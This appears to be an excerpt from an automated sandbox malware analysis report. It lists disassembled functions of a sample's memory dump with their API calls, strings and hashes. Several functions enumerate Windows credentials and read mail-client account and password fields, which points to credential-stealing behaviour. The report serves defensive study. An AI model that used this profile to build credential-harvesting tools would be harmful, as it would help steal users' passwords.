                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7C1F372A04606AFDB14DFA9C841BDEFFB0BF44314F14825EE428E7281D778A994CB95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004019E9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$strlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4288758904-3916222277
                                                                                                                                                                                                          • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                          • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408458 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                          • API String ID: 1371990430-260894208
                                                                                                                                                                                                          • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                          • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041025A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                          • API String ID: 2859077140-2022683286
                                                                                                                                                                                                          • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                          • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406A1A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                          • API String ID: 2881943006-572158859
                                                                                                                                                                                                          • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                          • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404A94 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                          • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                          • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004093DD Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                                                                                                          • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                          • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042DF2E Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                                                                          • database is already attached, xrefs: 0042E0DD
                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042E014
                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                                                                          • out of memory, xrefs: 0042E235
                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                          • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                          • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409989 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                          • String ID: $$d
                                                                                                                                                                                                          • API String ID: 2915808112-2066904009
                                                                                                                                                                                                          • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                          • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403158 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                                                                                                          • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                          • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041096F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                          • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                          • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405E41 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                            • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                            • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                                          • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                          • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F2E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                                          • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                          • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004036D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                          • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                                          • API String ID: 500647785-4097000612
                                                                                                                                                                                                          • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                          • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409213 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                                          • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                          • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

